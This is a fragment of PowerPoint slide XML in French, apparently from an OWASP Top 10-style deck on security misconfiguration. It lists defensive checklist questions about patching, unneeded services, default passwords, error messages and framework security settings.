                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>serveur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de production. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ledit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exemple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnérabilités</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>connues</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utilisables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> par </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’attaquant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pour </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>compromettre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>serveur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Suis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnérable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Avez-vous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>effectué</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>durcissement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sécurité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>approprié</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’ensemble</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> des couches de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>incluent</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="201168" indent="-201168" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Est-ce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>que</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>logiciels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> à jour ? OS, Web/App Server, BE, applications, et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’ensemble</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>librairies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de code (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Voir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> nouveau point A9).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" indent="-201168" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Y-a-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t’il</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fonction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inutiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>activées</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>installées</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(ex : ports, services, pages, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>comptes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privilèges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" indent="-201168" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Les mots de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> par </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>défaut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>activés</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inchangés</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" indent="-201168" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Affichez-vous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’état</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>paile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> et des messages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’erreurs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> aux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utilisateurs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" indent="-201168" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>La configuration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sécurité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> des frameworks de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>développement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Ex : Struts, Spring, ASP.NET) ne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>configurés</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> avec des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>valeurs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sécurisées</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sans </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>processus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de configuration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reproductible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>concerté</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>systèmes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> exposés .</a:t>
            </a:r>
